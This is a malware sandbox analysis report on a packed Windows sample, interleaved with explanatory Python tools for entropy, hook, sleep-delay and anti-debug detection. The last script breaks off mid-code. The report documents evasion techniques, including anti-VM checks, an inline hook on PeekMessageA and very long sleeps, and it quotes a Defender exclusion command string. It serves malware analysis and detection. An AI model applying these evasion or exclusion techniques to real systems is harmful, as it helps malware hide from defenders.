          Source: XhU4EXUp0x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5AC80 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5ACD1 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5AC31 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5B1C0 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B53768 push eax; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_0B4E944C push esp; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D069 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004080F7 pushad ; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004169CD push ecx; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004169F6 push eax; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041DA38 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0040E2FF push ds; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041DA97 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_00417ABB push ebx; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041833A push cs; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004164C5 push es; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D4FB push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D5C9 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D7F1 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF89 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF96 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_019AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_04B5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 12_2_00A980F7 pushad ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD069 push esi; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69F6 push eax; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69CD push ecx; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.68116376135
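The .text entropy of 7.68 bits per byte reported above is the usual packed-code signal: plain compiled x86 code sits well below 7, and the push/ret, push/retf and push/iretd "functions" listed above are what a disassembler produces when it walks encrypted bytes as if they were code, so most of them are not real control flow. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it walks a PE section table, scores each section with Shannon entropy and flags sections at or above 7.0, a heuristic cut-off of mine rather than a figure from the report. The test image it builds is constructed inline so the script runs offline.

```python
import math
import struct

# Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes.
def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

# Walk the section table of a PE image held in memory and score each section.
# Only the fields needed for the walk are parsed; the optional header is skipped.
def section_entropies(pe: bytes) -> dict:
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_hdr_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_hdr_size          # first IMAGE_SECTION_HEADER
    result = {}
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result

# Heuristic threshold (assumption, not from the report): a code section at or above
# 7.0 bits/byte is usually packed or encrypted and deserves unpacking before analysis.
PACKED_THRESHOLD = 7.0

def suspicious_sections(entropies: dict, threshold: float = PACKED_THRESHOLD) -> list:
    return sorted(name for name, e in entropies.items() if e >= threshold)

# Constructed test image (not the sample from the report): a minimal PE32 whose
# sections are laid out at 512-byte file alignment.
def build_test_pe(sections) -> bytes:
    opt_hdr_size = 0xE0
    headers_len = 0x40 + 24 + opt_hdr_size + 40 * len(sections)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_hdr_size, 0x0102)
    opt = bytearray(opt_hdr_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    table, body, va = b"", b"", 0x1000
    for name, data in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             raw_size, raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        va += 0x1000
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return image.ljust(raw_ptr, b"\0") + body

if __name__ == "__main__":
    # .text filled with every byte value equally (max entropy), .data with NOPs.
    pe = build_test_pe([(b".text", bytes(range(256)) * 4), (b".data", b"\x90" * 1024)])
    scores = section_entropies(pe)
    for name, e in scores.items():
        print(f"{name:8s} {e:.3f} bits/byte")
    print("likely packed:", suspicious_sections(scores))
```

On a real sample, pass the file bytes to `section_entropies`; a 7.68 result on .text, as in the report, means the static disassembly above is of the packer stub and its payload, and the real FormBook code only appears in the unpacked memory dumps.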

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE9
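The sandbox detects the hook by comparing the first bytes of the live export in explorer.exe with the bytes the function should start with. The same check is easy to reproduce: read the export's prolog from the DLL on disk and from the target process (ReadProcessMemory on Windows), diff the two, and decode the patch when it begins with a recognised control-transfer stub. The Python below is an added example, not code from the report or from the sample; the prolog bytes, addresses and hook target in it are constructed. It recognises jmp rel32, push imm32/ret and indirect jmp stubs and reports anything else as an opaque patch, which is what it returns for the six bytes printed above, since they do not begin with a jump opcode; a full verdict on PeekMessageA needs the on-disk prolog, which the report does not show.

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF

# Decode the control-transfer stubs hooking frameworks and malware commonly write
# over an export's prolog. Returns (kind, target) or None for an unrecognised patch.
def decode_hook_stub(code: bytes, address: int):
    if len(code) >= 5 and code[0] == 0xE9:                            # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp rel32", (address + 5 + rel) & MASK64)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:        # push imm32; ret
        return ("push/ret", struct.unpack_from("<I", code, 1)[0])
    if len(code) >= 14 and code[:6] == b"\xFF\x25\x00\x00\x00\x00":   # x64: jmp [rip+0]; dq target
        return ("jmp [rip+0]", struct.unpack_from("<Q", code, 6)[0])
    if len(code) >= 6 and code[:2] == b"\xFF\x25":                     # jmp [disp32] (x86 abs / x64 rip-rel)
        return ("jmp indirect", struct.unpack_from("<i", code, 2)[0])
    return None

# Compare the prolog read from the DLL on disk with the prolog read from the live
# process. Any difference is a modification; the stub decoder names the common ones.
def compare_prolog(name: str, on_disk: bytes, in_memory: bytes, address: int) -> dict:
    n = min(len(on_disk), len(in_memory))
    first_diff = next((i for i in range(n) if on_disk[i] != in_memory[i]), None)
    if first_diff is None:
        return {"function": name, "hooked": False}
    stub = decode_hook_stub(in_memory, address)
    return {
        "function": name,
        "hooked": True,
        "first_diff": first_diff,
        "stub": stub[0] if stub else "unknown (opaque patch)",
        "target": stub[1] if stub else None,
    }

if __name__ == "__main__":
    # Constructed data: a plausible x64 prolog and a hooked copy that jumps to 0x20005000.
    addr = 0x10001000
    clean = bytes.fromhex("488BC44889580848896810")     # mov rax,rsp; mov [rax+8],rbx; ...
    hooked = bytes.fromhex("E9FB3F001090909090909090")  # jmp 0x20005000; nop padding
    print(compare_prolog("PeekMessageA", clean, hooked, addr))
    print(compare_prolog("PeekMessageA", clean, clean, addr))
    # The six bytes the report prints for PeekMessageA, on their own:
    print(decode_hook_stub(bytes.fromhex("488BB8855EE9"), addr))
```

When running this against a live process, resolve the export's RVA from the DLL's export table so the on-disk and in-memory offsets match, and remember that legitimate software (EDR agents, application-compatibility shims) also hooks user32 exports; the target address, not the mere presence of a hook, tells you which module the detour lands in.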
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: XhU4EXUp0x.exe PID: 6968, type: MEMORY
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A998E4 second address: 0000000000A998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A99B4E second address: 0000000000A99B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 6972Thread sleep time: -104441s >= -30000s
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 7020Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 2016Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3220Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6964Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 104441
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
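The delay values above are worth decoding rather than reading as noise. NtDelayExecution takes a LARGE_INTEGER of 100 ns ticks, negative for a relative delay, and kernel32!Sleep(ms) passes -ms * 10000. 922337203685477 is exactly 0x7FFFFFFFFFFFFFFF // 10000, so the two threads that "slept" for that long most likely passed the largest possible relative interval, roughly 29,000 years (an inference from the arithmetic, not a statement the report makes); 104441 ms is a 104 s stall. Both are well past the 30 s the sandbox compares against ("-30000s" in the lines above), which is why sandboxes patch or skip long sleeps. The Python below is an added example, not from the report or the sample: it converts raw intervals to milliseconds, flags stalls against that threshold and totals the time a non-patching sandbox would sit idle. The event list is constructed from the thread IDs and values printed above.

```python
INT64_MAX = 0x7FFFFFFFFFFFFFFF
TICKS_PER_MS = 10_000          # NtDelayExecution intervals count 100 ns ticks

def delay_interval_to_ms(raw: int) -> tuple:
    """Decode the LARGE_INTEGER passed to NtDelayExecution.
    A negative value is a relative delay; a positive value is an absolute system time."""
    if raw < 0:
        return ("relative", (-raw) // TICKS_PER_MS)
    return ("absolute", raw // TICKS_PER_MS)

def sleep_ms_to_interval(ms: int) -> int:
    """The relative interval kernel32!Sleep(ms) hands to NtDelayExecution."""
    return -ms * TICKS_PER_MS

def is_sandbox_stall(raw: int, threshold_ms: int = 30_000) -> bool:
    """Flag relative delays at or beyond the threshold. 30 s matches the comparison the
    report prints; absolute timestamps are not stalls and are left alone."""
    kind, ms = delay_interval_to_ms(raw)
    return kind == "relative" and ms >= threshold_ms

def triage_delays(events, threshold_ms: int = 30_000):
    """events: iterable of (tid, raw_interval). Returns one record per call and the
    total idle time a sandbox that does not patch sleeps would have spent."""
    records, idle_ms = [], 0
    for tid, raw in events:
        kind, ms = delay_interval_to_ms(raw)
        stall = is_sandbox_stall(raw, threshold_ms)
        if stall:
            idle_ms += ms
        records.append({"tid": tid, "kind": kind, "ms": ms, "stall": stall})
    return records, idle_ms

if __name__ == "__main__":
    # Constructed from the report's thread IDs and delay values (assumed raw intervals).
    observed = [
        (6972, sleep_ms_to_interval(104441)),   # 104 s
        (7020, -INT64_MAX),                     # decodes to 922337203685477 ms
        (2016, -INT64_MAX),
        (3220, sleep_ms_to_interval(60000)),    # explorer.exe, 60 s
        (6964, sleep_ms_to_interval(65000)),    # raserver.exe, 65 s
    ]
    records, idle = triage_delays(observed)
    for r in records:
        print(f"tid {r['tid']:5d} {r['kind']:8s} {r['ms']:>18d} ms  stall={r['stall']}")
    print("idle if sleeps were honoured:", idle, "ms")
```

In detection content, the useful signal is a relative NtDelayExecution interval whose magnitude is orders of magnitude beyond anything a legitimate program uses; a hook that shortens such calls (as the sandbox did here) keeps the analysis moving but should log the original value, because the value itself is the indicator.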
          Source: explorer.exe, 00000005.00000000.680569789.000000000A868000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI`=
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
          Source: explorer.exe, 00000005.00000000.697429263.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNw
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: explorer.exe, 00000005.00000000.677896891.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNDAWin32_VideoController92RGKB5VVideoController120060621000000.000000-00068978660display.infMSBDACRVZ4Z54PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsAXM45XBV>K
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669704877.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
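The DebugPort queries above are NtQueryInformationProcess(ProcessDebugPort) checks, and the many fs:[00000030h] reads in the rest of this section are code fetching the PEB pointer from the TEB. The anti-debug use of that pointer is a read of PEB+0x02 (BeingDebugged) or, on 32-bit, PEB+0x68 (NtGlobalFlag, whose heap-debug bits are set under a debugger) immediately afterwards; the report records the PEB loads but not which field is read. The Python below is an added example, not from the report or the sample: a byte-pattern scanner that finds the common 32-bit encodings of the PEB load and reports which anti-debug field accesses follow within a short window. The opcode table, the window size and the sample bytes are my own constructions, and a real scan should sit on top of a disassembler to avoid matching data that happens to contain these bytes, exactly the false positives the push/ret listings earlier in the report illustrate.

```python
import re

# 32-bit encodings of "load the PEB pointer from the TEB" (0x64 = fs segment override).
PEB_LOADS = {
    b"\x64\xA1\x30\x00\x00\x00":     "mov eax, fs:[30h]",
    b"\x64\x8B\x05\x30\x00\x00\x00": "mov eax, fs:[30h]",
    b"\x64\x8B\x0D\x30\x00\x00\x00": "mov ecx, fs:[30h]",
    b"\x64\x8B\x15\x30\x00\x00\x00": "mov edx, fs:[30h]",
}

# Follow-up accesses that turn the PEB pointer into a debugger decision. ModRM bytes
# cover a base register of eax/ecx/edx. Offsets are for the 32-bit PEB:
# +0x02 BeingDebugged, +0x68 NtGlobalFlag.
PEB_FIELD_READS = [
    (re.compile(rb"\x0F\xB6[\x40\x41\x42]\x02"), "movzx r32, byte [reg+2]  (BeingDebugged)"),
    (re.compile(rb"\x8A[\x40\x41\x42]\x02"),     "mov r8, byte [reg+2]     (BeingDebugged)"),
    (re.compile(rb"\x80[\x78\x79\x7A]\x02\x00"), "cmp byte [reg+2], 0      (BeingDebugged)"),
    (re.compile(rb"\x8B[\x40\x41\x42\x48\x49\x4A\x50\x51\x52]\x68"),
                                                 "mov r32, [reg+68h]       (NtGlobalFlag)"),
]

def find_peb_antidebug(code: bytes, window: int = 16) -> list:
    """Locate PEB loads and the anti-debug field reads that follow each one.
    `window` (assumption) bounds how far past the load a field read may appear."""
    hits = []
    for pattern, mnemonic in PEB_LOADS.items():
        start = 0
        while (pos := code.find(pattern, start)) != -1:
            after = pos + len(pattern)
            follow = code[after:after + window]
            checks = [desc for rx, desc in PEB_FIELD_READS if rx.search(follow)]
            hits.append({"offset": pos, "load": mnemonic, "checks": checks})
            start = pos + 1
    return sorted(hits, key=lambda h: h["offset"])

# Constructed sample (not bytes from the report): a function that reads BeingDebugged,
# then NtGlobalFlag, the way a hand-written loader does.
SAMPLE = bytes.fromhex(
    "558BEC"            # push ebp; mov ebp, esp
    "64A130000000"      # mov eax, fs:[30h]          (offset 3)
    "0FB64002"          # movzx eax, byte [eax+2]    BeingDebugged
    "85C07505"          # test eax, eax; jnz +5
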